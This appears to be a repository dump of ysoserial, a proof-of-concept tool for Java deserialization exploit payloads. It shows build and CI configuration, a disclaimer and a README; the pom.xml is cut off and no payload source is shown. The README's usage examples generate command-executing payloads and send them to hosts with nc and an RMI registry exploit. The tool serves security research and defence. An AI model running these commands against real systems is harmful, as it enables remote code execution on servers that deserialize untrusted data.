Full Code of frohoff/ysoserial for AI

Repository: frohoff/ysoserial
Branch: master
Commit: 218bcffcaaa9
Files: 91
Total size: 255.9 KB

Directory structure:
gitextract_xl98u19g/

├── .editorconfig
├── .github/
│   └── workflows/
│       └── publish.yml
├── .gitignore
├── .travis.yml
├── DISCLAIMER.txt
├── Dockerfile
├── LICENSE.txt
├── README.md
├── appveyor.yml
├── assembly.xml
├── pom.xml
└── src/
    ├── main/
    │   └── java/
    │       └── ysoserial/
    │           ├── Deserializer.java
    │           ├── GeneratePayload.java
    │           ├── Serializer.java
    │           ├── Strings.java
    │           ├── exploit/
    │           │   ├── JBoss.java
    │           │   ├── JMXInvokeMBean.java
    │           │   ├── JRMPClassLoadingListener.java
    │           │   ├── JRMPClient.java
    │           │   ├── JRMPListener.java
    │           │   ├── JSF.java
    │           │   ├── JenkinsCLI.java
    │           │   ├── JenkinsListener.java
    │           │   ├── JenkinsReverse.java
    │           │   └── RMIRegistryExploit.java
    │           ├── payloads/
    │           │   ├── AspectJWeaver.java
    │           │   ├── BeanShell1.java
    │           │   ├── C3P0.java
    │           │   ├── Click1.java
    │           │   ├── Clojure.java
    │           │   ├── CommonsBeanutils1.java
    │           │   ├── CommonsCollections1.java
    │           │   ├── CommonsCollections2.java
    │           │   ├── CommonsCollections3.java
    │           │   ├── CommonsCollections4.java
    │           │   ├── CommonsCollections5.java
    │           │   ├── CommonsCollections6.java
    │           │   ├── CommonsCollections7.java
    │           │   ├── DynamicDependencies.java
    │           │   ├── FileUpload1.java
    │           │   ├── Groovy1.java
    │           │   ├── Hibernate1.java
    │           │   ├── Hibernate2.java
    │           │   ├── JBossInterceptors1.java
    │           │   ├── JRMPClient.java
    │           │   ├── JRMPListener.java
    │           │   ├── JSON1.java
    │           │   ├── JavassistWeld1.java
    │           │   ├── Jdk7u21.java
    │           │   ├── Jython1.java
    │           │   ├── MozillaRhino1.java
    │           │   ├── MozillaRhino2.java
    │           │   ├── Myfaces1.java
    │           │   ├── Myfaces2.java
    │           │   ├── ObjectPayload.java
    │           │   ├── ROME.java
    │           │   ├── ReleaseableObjectPayload.java
    │           │   ├── Spring1.java
    │           │   ├── Spring2.java
    │           │   ├── URLDNS.java
    │           │   ├── Vaadin1.java
    │           │   ├── Wicket1.java
    │           │   ├── annotation/
    │           │   │   ├── Authors.java
    │           │   │   ├── Dependencies.java
    │           │   │   └── PayloadTest.java
    │           │   └── util/
    │           │       ├── ClassFiles.java
    │           │       ├── Gadgets.java
    │           │       ├── JavaVersion.java
    │           │       ├── PayloadRunner.java
    │           │       └── Reflections.java
    │           └── secmgr/
    │               ├── DelegateSecurityManager.java
    │               └── ExecCheckingSecurityManager.java
    └── test/
        └── java/
            └── ysoserial/
                ├── CiTest.java
                └── test/
                    ├── CustomDeserializer.java
                    ├── CustomPayloadArgs.java
                    ├── CustomTest.java
                    ├── WrappedTest.java
                    ├── exploit/
                    │   └── RMIRegistryExploitTest.java
                    ├── payloads/
                    │   ├── CommandExecTest.java
                    │   ├── FileUploadTest.java
                    │   ├── JRMPReverseConnectSMTest.java
                    │   ├── JRMPReverseConnectTest.java
                    │   ├── MyfacesTest.java
                    │   ├── PayloadsTest.java
                    │   ├── RemoteClassLoadingTest.java
                    │   └── TestHarnessTest.java
                    └── util/
                        ├── Callables.java
                        ├── Files.java
                        ├── GadgetsTest.java
                        ├── OS.java
                        └── Throwables.java

================================================
FILE CONTENTS
================================================

================================================
FILE: .editorconfig
================================================
root = true

[*]
end_of_line = lf
charset = utf-8
trim_trailing_whitespace = true
insert_final_newline = true
indent_style = space
indent_size = 4
max_line_length = 120

[*.{yml,yaml}]
indent_size = 2


================================================
FILE: .github/workflows/publish.yml
================================================
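# Builds the assembled jar and attaches it to a GitHub release whenever a
# version tag matching v*.*.* is pushed.
name: publish jar
on:
  push:
    tags:
      - "v*.*.*"
permissions:
  contents: write

jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      # Needed to create the release and upload the jar.
      contents: write
      # Only the commented-out `mvn deploy` step below would use this scope;
      # consider dropping it while that step stays disabled.
      packages: write
    env:
      # The tag name is handed to the shell as data through the environment
      # instead of being expanded into the script text, so characters in a ref
      # name are never parsed as shell syntax.
      REF_NAME: ${{ github.ref_name }}
    steps:
      # NOTE(review): the actions below are referenced by mutable tags (@v3, @v1).
      # Pinning each to a full commit SHA prevents a retagged release from
      # running with this job's write token.
      - uses: actions/checkout@v3
      - uses: actions/setup-java@v3
        with:
          java-version: '8'
          distribution: 'adopt'
          cache: 'maven'
      - name: Set version
        run: mvn versions:set -DnewVersion="$REF_NAME"
      - name: Build jar
        # No GITHUB_TOKEN here: the build resolves dependencies and plugins from
        # third-party repositories and does not need repository write access.
        run: mvn -B clean package -DskipTests
      # - name: publish maven jar
      #   run: mvn -B deploy -DskipTests -DrepositoryId=github
      #   env:
      #     GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Rename artifact
        run: mv "target/ysoserial-${REF_NAME}-all.jar" target/ysoserial-all.jar

      - name: Publish GitHub release
        uses: softprops/action-gh-release@v1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          files: target/ysoserial-all.jar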

================================================
FILE: .gitignore
================================================
# java
*.class

# mvn
target/

# eclipse
.classpath
.project
.settings/

# idea
.idea/
*.iml

# tests
pwntest


================================================
FILE: .travis.yml
================================================
dist: trusty
language: java

cache:
  directories:
  - $HOME/.m2
  - $HOME/.mvn/

# jdk6 requires workarounds https://github.com/travis-ci/travis-ci/issues/9713
addons:
  apt:
    packages:
      - openjdk-6-jdk

before_install:
  # Fetches Maven 3.2.5 into the cached $HOME/.mvn directory for the openjdk6 job.
  # NOTE(review): the archive is piped straight from curl into tar with no
  # checksum or signature check, so the build trusts whatever the mirror
  # returns over HTTPS; verifying a published digest before unpacking would
  # close that gap.
  # NOTE(review): in sh, `a || b && c` groups as `(a || b) && c`, so the
  # download appears to run even when the cached mvn is found; confirm.
  - > # install mvn 3.2.5 for use with java6
      which $HOME/.mvn/3.2.5/bin/mvn || mkdir -p $HOME/.mvn/3.2.5 &&
      curl https://apache.osuosl.org/maven/maven-3/3.2.5/binaries/apache-maven-3.2.5-bin.tar.gz |
      tar xz -C $HOME/.mvn/3.2.5 --strip-components=1
  # Switch the JDK only for the openjdk6 matrix entry.
  - if [ "$TRAVIS_JDK_VERSION" == "openjdk6" ]; then jdk_switcher use openjdk6; fi
  # Print the Maven and JDK versions actually in use.
  - mvn -v

after_script:
  - > # print more detailed info about test results
      cat target/surefire-reports/TEST-ysoserial.test.payloads.PayloadsTest.xml |
      grep testcase -A1 | grep -B1 -E 'failure|error|skipped' | grep -v -- --

matrix:
  fast_finish: true
  allow_failures:
    - jdk: oraclejdk11
    - jdk: openjdk6
    - jdk: openjdk7
    - jdk: openjdk9
    - jdk: openjdk10
    - jdk: openjdk11
  include:
    #- jdk: oraclejdk7 #https://github.com/travis-ci/travis-ci/issues/7884
    - jdk: oraclejdk8
    - jdk: oraclejdk11
    - jdk: openjdk6
      env: PATH=$HOME/.mvn/3.2.5/bin:$PATH
    - jdk: openjdk7
    - jdk: openjdk8
    - jdk: openjdk9
    - jdk: openjdk10
    - jdk: openjdk11




================================================
FILE: DISCLAIMER.txt
================================================
DISCLAIMER

This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers 
are not responsible or liable for misuse of the software. Use responsibly.

================================================
FILE: Dockerfile
================================================
# Stage 1: build the assembled jar with Maven on JDK 8.
# NOTE(review): both base images are referenced by mutable tags; pinning them by
# digest would make the build reproducible and guard against a replaced tag.
FROM maven:3.5-jdk-8 as builder

WORKDIR /app

# download artifacts
# Only the build descriptors are copied first, so the dependency layers below
# can be reused when just the sources change.
COPY pom.xml .
COPY assembly.xml .
RUN mvn dependency:resolve
RUN mvn verify
RUN mvn compiler:help

# build
COPY src ./src
RUN mvn clean package -DskipTests
RUN mv target/ysoserial-*all*.jar target/ysoserial.jar

# Stage 2: runtime image that carries only the jar.
# NOTE(review): no USER instruction is set, so the entrypoint runs as the base
# image's default user, presumably root; confirm, and add a non-root USER if
# the image is used anywhere other than a throwaway test environment.
FROM eclipse-temurin:8-jdk-alpine

WORKDIR /app

COPY --from=builder /app/target/ysoserial.jar .

# Container arguments are passed straight through to the payload generator.
ENTRYPOINT ["java", "-jar", "ysoserial.jar"]


================================================
FILE: LICENSE.txt
================================================
Copyright (c) 2013 Chris Frohoff

MIT License

Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:

The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

================================================
FILE: README.md
================================================

# ysoserial

[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
[![Travis Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)
[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
[![JitPack](https://jitpack.io/v/frohoff/ysoserial.svg)](https://jitpack.io/#frohoff/ysoserial)

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

![logo](ysoserial.png)

## Description

Originally released as part of AppSecCali 2015 Talk
["Marshalling Pickles: how deserializing objects will ruin your day"](
        https://frohoff.github.io/appseccali-marshalling-pickles/)
with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).
Later updated to include additional gadget chains for
[JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries.

__ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common Java
libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of
objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
this data, the chain will automatically be invoked and cause the command to be executed on the application host.

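It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
gadgets on the classpath. Removing or upgrading a gadget library only takes away one known chain; the durable fix is to
stop deserializing untrusted data, or to restrict the accepted classes with an allow-list filter (for example a JEP 290
`ObjectInputFilter`).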

## Disclaimer

This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers
are not responsible or liable for misuse of the software. Use responsibly.

## Usage

```shell
$  java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
  Available payload types:
     Payload             Authors                     Dependencies
     -------             -------                     ------------
     AspectJWeaver       @Jang                       aspectjweaver:1.9.2, commons-collections:3.2.2
     BeanShell1          @pwntester, @cschneider4711 bsh:2.0b5
     C3P0                @mbechler                   c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Click1              @artsploit                  click-nodeps:2.3.0, javax.servlet-api:3.1.0
     Clojure             @JackOfMostTrades           clojure:1.8.0
     CommonsBeanutils1   @frohoff                    commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                    commons-collections:3.1
     CommonsCollections2 @frohoff                    commons-collections4:4.0
     CommonsCollections3 @frohoff                    commons-collections:3.1
     CommonsCollections4 @frohoff                    commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
     CommonsCollections6 @matthias_kaiser            commons-collections:3.1
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     FileUpload1         @mbechler                   commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                    groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser            javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient          @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                   json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser            javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711 jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser            js:1.7R2
     MozillaRhino2       @_tint0                     js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                   rome:1.0
     Spring1             @frohoff                    spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                   spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Vaadin1             @kai_ullrich                vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1             @jacob-baines               wicket-util:6.23.0, slf4j-api:1.6.4
```

## Examples

```shell
$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
```

## Installation

[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)

Download the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases.

## Building

Requires Java 1.7+ and Maven 3.x+

```mvn clean package -DskipTests```

## Code Status

[![Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)
[![Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)

## Contributing

1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request

## See Also
* [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc.
* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries
* [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization


================================================
FILE: appveyor.yml
================================================
# based on https://github.com/GoogleCloudPlatform/google-cloud-java/blob/master/appveyor.yml

# build version
version: '{build}'

# Do not build on tags
skip_tags: true

# environment settings
environment:
  matrix:
    - JAVA_HOME: C:\Program Files\Java\jdk1.6.0
      M2_HOME: C:\bin\apache-maven-3.2.5
    - JAVA_HOME: C:\Program Files\Java\jdk1.7.0
      MAVEN_OPTS: -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2
    - JAVA_HOME: C:\Program Files\Java\jdk1.8.0

matrix:
  allow_failures:
    - JAVA_HOME: C:\Program Files\Java\jdk1.6.0
    - JAVA_HOME: C:\Program Files\Java\jdk1.7.0

# install required tools (maven, secure-file, encrypted files)
install:
  # Installs Maven 3.2.5 through Chocolatey unless the cached copy already exists.
  # NOTE(review): --allow-empty-checksums lets Chocolatey accept a package that
  # ships no checksum, so the downloaded Maven binaries are not integrity-checked.
  - cmd: if not exist "C:\bin\apache-maven-3.2.5\bin\*.*" cinst maven --version 3.2.5 --allow-empty-checksums
  # Echo the toolchain locations into the build log for troubleshooting.
  - cmd: echo %JAVA_HOME%
  - cmd: echo %M2_HOME%

# build and install artifacts
build_script:
  - '"%M2_HOME%\bin\mvn" clean install -DskipTests'

# verify artifacts
test_script:
  - '"%M2_HOME%\bin\mvn" test'

# preserve dependencies between builds
cache:
  - C:\Users\appveyor\.m2
  - C:\bin\apache-maven-3.2.5


================================================
FILE: assembly.xml
================================================
<assembly
    xmlns="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3 http://maven.apache.org/xsd/assembly-1.1.3.xsd">
    <id>fat-tests</id>
    <formats>
        <format>jar</format>
    </formats>
    <includeBaseDirectory>false</includeBaseDirectory>
    <dependencySets>
        <dependencySet>
            <outputDirectory>/</outputDirectory>
            <useProjectArtifact>true</useProjectArtifact>
            <unpack>true</unpack>
            <scope>test</scope>
        </dependencySet>
    </dependencySets>
    <fileSets>
        <fileSet>
            <directory>${project.build.directory}/test-classes</directory>
            <outputDirectory>/</outputDirectory>
            <includes>
                <include>**/*.class</include>
            </includes>
            <useDefaultExcludes>true</useDefaultExcludes>
        </fileSet>
    </fileSets>
</assembly>


================================================
FILE: pom.xml
================================================
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<groupId>ysoserial</groupId>
	<artifactId>ysoserial</artifactId>
	<version>0.0.6-SNAPSHOT</version>
	<packaging>jar</packaging>

	<name>ysoserial</name>
	<url>https://github.com/frohoff/ysoserial/</url>

	<properties>
		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
	</properties>

	<build>
		<plugins>
			<plugin>
				<groupId>org.apache.maven.plugins</groupId>
				<artifactId>maven-compiler-plugin</artifactId>
				<version>3.5.1</version>
				<configuration>
					<!-- maximize compatibility -->
					<source>1.6</source>
					<target>1.6</target>
					<!-- ignore noisy internal api warnings -->
					<compilerArgument>-XDignore.symbol.file</compilerArgument>
					<fork>true</fork>
				</configuration>
			</plugin>
			<plugin>
				<artifactId>maven-assembly-plugin</artifactId>
				<configuration>
					<finalName>${project.artifactId}-${project.version}-all</finalName>
					<appendAssemblyId>false</appendAssemblyId>
					<archive>
						<manifest>
							<mainClass>ysoserial.GeneratePayload</mainClass>
						</manifest>
					</archive>
					<descriptors>
						<descriptor>assembly.xml</descriptor>						
					</descriptors>
				</configuration>
				<executions>
					<execution>
						<id>make-assembly</id>
						<phase>package</phase>
						<goals>
							<goal>single</goal>
						</goals>
					</execution>
				</executions>
			</plugin>
			<plugin>
				<groupId>org.apache.maven.plugins</groupId>
				<artifactId>maven-surefire-plugin</artifactId>
				<version>3.0.0-M1</version>
				<configuration>
					<trimStackTrace>false</trimStackTrace>
					<systemPropertyVariables>
						<java.rmi.server.useCodebaseOnly>false</java.rmi.server.useCodebaseOnly>
					</systemPropertyVariables>
				</configuration>
			</plugin>
		</plugins>
	</build>

	<repositories>
		<repository>
			<id>central</id>
			<layout>default</layout>
			<url>https://repo.maven.apache.org/maven2/</url>
		</repository>		
		<repository>
			<id>ysoserial-m2-repo</id>
			<layout>default</layout>
			<url>https://raw.githubusercontent.com/frohoff/ysoserial-m2-repo/master</url>
		</repository>
		<repository>
			<id>jenkins</id>
			<layout>default</layout>
			<url>https://repo.jenkins-ci.org/public/</url>
		</repository>
	</repositories>

	<dependencies>

		<!-- testing dependencies -->

		<dependency>
			<groupId>junit</groupId>
			<artifactId>junit</artifactId>
			<version>4.12</version>
			<scope>test</scope>
		</dependency>
		<dependency>
			<groupId>org.mockito</groupId>
			<artifactId>mockito-core</artifactId>
			<version>1.10.19</version>
			<scope>test</scope>
		</dependency>
		<dependency>
			<groupId>com.github.stefanbirkner</groupId>
			<artifactId>system-rules</artifactId>
			<version>1.8.0</version>
			<scope>test</scope>
		</dependency>
		<dependency>
			<groupId>org.nanohttpd</groupId>
			<artifactId>nanohttpd</artifactId>
			<version>2.2.0</version>
			<scope>test</scope>
		</dependency>


		<!-- non-gadget dependencies -->

		<dependency>
			<groupId>org.reflections</groupId>
			<artifactId>reflections</artifactId>
			<version>0.9.9</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.shrinkwrap.resolver</groupId>
			<artifactId>shrinkwrap-resolver-depchain</artifactId>
			<version>2.2.6</version>
			<type>pom</type>
		</dependency>
		<dependency>
			<groupId>org.javassist</groupId>
			<artifactId>javassist</artifactId>
			<version>3.19.0-GA</version>
		</dependency>
		<dependency>
			<groupId>com.nqzero</groupId>
			<artifactId>permit-reflect</artifactId>
			<version>0.3</version>
		</dependency>
		<dependency>
			<groupId>commons-codec</groupId>
			<artifactId>commons-codec</artifactId>
			<version>1.9</version>
		</dependency>
		<dependency>
			<groupId>commons-io</groupId>
			<artifactId>commons-io</artifactId>
			<version>2.6</version>
		</dependency>
		<dependency>
			<artifactId>remoting</artifactId>
			<groupId>org.jenkins-ci.main</groupId>
			<version>2.55</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.logging</groupId>
			<artifactId>jboss-logging</artifactId>
			<version>3.3.0.Final</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.remoting</groupId>
			<artifactId>jboss-remoting</artifactId>
			<version>4.0.19.Final</version>
		</dependency>
		<dependency>
			<groupId>org.jboss</groupId>
			<artifactId>jboss-common-core</artifactId>
			<version>2.5.0.Final</version>
			<exclusions>
				<exclusion>
					<groupId>org.jboss.logging</groupId>
					<artifactId>jboss-logging-spi</artifactId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.jboss.xnio</groupId>
			<artifactId>xnio-nio</artifactId>
			<version>3.3.4.Final</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.sasl</groupId>
			<artifactId>jboss-sasl</artifactId>
			<version>1.0.5.Final</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.remotingjmx</groupId>
			<artifactId>remoting-jmx</artifactId>
			<version>2.0.1.Final</version>
		</dependency>

		<!-- gadget dependencies -->

		<dependency>
			<groupId>commons-collections</groupId>
			<artifactId>commons-collections</artifactId>
			<version>3.1</version>
		</dependency>
		<dependency>
			<groupId>org.beanshell</groupId>
			<artifactId>bsh</artifactId>
			<version>2.0b5</version>
		</dependency>
		<dependency>
			<groupId>commons-beanutils</groupId>
			<artifactId>commons-beanutils</artifactId>
			<version>1.9.2</version>
		</dependency>
		<dependency>
			<groupId>org.apache.commons</groupId>
			<artifactId>commons-collections4</artifactId>
			<version>4.0</version>
		</dependency>
		<dependency>
			<groupId>org.codehaus.groovy</groupId>
			<artifactId>groovy</artifactId>
			<version>2.3.9</version>
		</dependency>
		<dependency>
			<groupId>org.springframework</groupId>
			<artifactId>spring-core</artifactId>
			<version>4.1.4.RELEASE</version>
		</dependency>
		<dependency>
			<groupId>org.springframework</groupId>
			<artifactId>spring-beans</artifactId>
			<version>4.1.4.RELEASE</version>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-core</artifactId>
			<version>4.3.11.Final</version>
		</dependency>
		<dependency>
			<groupId>org.springframework</groupId>
			<artifactId>spring-aop</artifactId>
			<version>4.1.4.RELEASE</version>
		</dependency>
		<dependency>
			<groupId>net.sf.json-lib</groupId>
			<artifactId>json-lib</artifactId>
			<classifier>jdk15</classifier>
			<version>2.4</version>
		</dependency>
		<dependency>
			<groupId>commons-fileupload</groupId>
			<artifactId>commons-fileupload</artifactId>
			<version>1.3</version>
		</dependency>
		<dependency>
			<groupId>org.apache.wicket</groupId>
			<artifactId>wicket-util</artifactId>
			<version>6.23.0</version>
		</dependency>
		<dependency>
			<groupId>com.mchange</groupId>
			<artifactId>c3p0</artifactId>
			<version>0.9.5.2</version>
		</dependency>
		<dependency>
			<groupId>javax.servlet</groupId>
			<artifactId>javax.servlet-api</artifactId>
			<version>3.1.0</version>
		</dependency>
		<dependency>
			<groupId>org.apache.myfaces.core</groupId>
			<artifactId>myfaces-impl</artifactId>
			<version>2.2.9</version>
		</dependency>
		<dependency>
			<groupId>xalan</groupId>
			<artifactId>xalan</artifactId>
			<version>2.7.2</version>
		</dependency>
		<dependency>
			<groupId>rome</groupId>
			<artifactId>rome</artifactId>
			<version>1.0</version>
		</dependency>
		<dependency>
			<groupId>org.python</groupId>
			<artifactId>jython-standalone</artifactId>
			<version>2.5.2</version>
		</dependency>
		<dependency>
			<groupId>rhino</groupId>
			<artifactId>js</artifactId>
			<version>1.7R2</version>
		</dependency>
		<dependency>
		<groupId>javassist</groupId>
		<artifactId>javassist</artifactId>
		<version>3.12.0.GA</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.weld</groupId>
			<artifactId>weld-core</artifactId>
			<version>1.1.33.Final</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.interceptor</groupId>
			<artifactId>jboss-interceptor-core</artifactId>
			<version>2.0.0.Final</version>
		</dependency>
		<dependency>
			<groupId>org.jboss.interceptor</groupId>
			<artifactId>jboss-interceptor-spi</artifactId>
			<version>2.0.0.Final</version>
		</dependency>
		<dependency>
			<groupId>javax.enterprise</groupId>
			<artifactId>cdi-api</artifactId>
			<version>1.0-SP1</version>
		</dependency>
		<dependency>
			<groupId>javax.interceptor</groupId>
			<artifactId>javax.interceptor-api</artifactId>
			<version>3.1</version>
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>slf4j-api</artifactId>
			<version>1.7.21</version>
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>slf4j-jdk14</artifactId>
			<version>1.7.21</version>
		</dependency>
		<dependency>
			<groupId>org.clojure</groupId>
			<artifactId>clojure</artifactId>
			<version>1.8.0</version>
		</dependency>
		<dependency>
			<groupId>com.vaadin</groupId>
			<artifactId>vaadin-server</artifactId>
			<version>7.7.14</version>
		</dependency>
		<dependency>
			<groupId>org.aspectj</groupId>
			<artifactId>aspectjweaver</artifactId>
			<version>1.9.5</version>
		</dependency>
		<dependency>
			<groupId>org.apache.click</groupId>
			<artifactId>click-nodeps</artifactId>
			<version>2.3.0</version>
		</dependency>
	</dependencies>

	<profiles>
		<profile>
			<id>jdk6</id>
			<activation>
				<jdk>1.6</jdk>
			</activation>
			<build>
				<plugins>
					<plugin>
						<groupId>org.apache.maven.plugins</groupId>
						<artifactId>maven-surefire-plugin</artifactId>
						<version>2.22.1</version>
					</plugin>
				</plugins>
			</build>
			<dependencies>
				<dependency>
					<groupId>javax.el</groupId>
					<artifactId>javax.el-api</artifactId>
					<version>3.0.0</version>
				</dependency>
			</dependencies>
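			<!-- workaround for non-overlapping TLS versions in JDK6 and central repo
			 https://central.sonatype.org/articles/2018/May/04/discontinued-support-for-tlsv11-and-below/
			 Artifacts and plugins resolved under this profile therefore travel over plain HTTP with no
			 transport integrity; keep it limited to JDK 6 compatibility builds. -->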
			<repositories>
				<repository>
					<id>repo1</id>
					<url>http://repo1.maven.org/maven2</url><!-- intentionally http (see above) -->
				</repository>
			</repositories>
			<pluginRepositories>
				<pluginRepository>
					<id>repo1</id>
					<url>http://repo1.maven.org/maven2</url><!-- intentionally http (see above) -->
				</pluginRepository>
			</pluginRepositories>
		</profile>

		<profile>
			<id>hibernate5</id>
			<activation>
				<property>
					<name>hibernate5</name>
				</property>
			</activation>
			<dependencies>
				<dependency>
					<groupId>org.hibernate</groupId>
					<artifactId>hibernate-core</artifactId>
					<version>5.0.7.Final</version>
				</dependency>
				<dependency>
					<groupId>javax.el</groupId>
					<artifactId>javax.el-api</artifactId>
					<version>3.0.0</version>
				</dependency>
			</dependencies>
		</profile>

		<profile>
			<id>apache-el</id>
			<activation>
				<activeByDefault>true</activeByDefault>
				<property>
					<name>el</name>
					<value>apache</value>
				</property>
			</activation>
			<dependencies>
				<dependency>
					<groupId>org.mortbay.jasper</groupId>
					<artifactId>apache-el</artifactId>
					<version>8.0.27</version>
				</dependency>
			</dependencies>
		</profile>

		<profile>
			<id>juel</id>
			<activation>
				<property>
					<name>el</name>
					<value>juel</value>
				</property>
			</activation>
			<dependencies>
				<dependency>
					<groupId>de.odysseus.juel</groupId>
					<artifactId>juel-impl</artifactId>
					<version>2.2.7</version>
				</dependency>
				<dependency>
					<groupId>de.odysseus.juel</groupId>
					<artifactId>juel-api</artifactId>
					<version>2.2.7</version>
				</dependency>
			</dependencies>
		</profile>

	</profiles>
	<distributionManagement>
		<repository>
			<id>github</id>
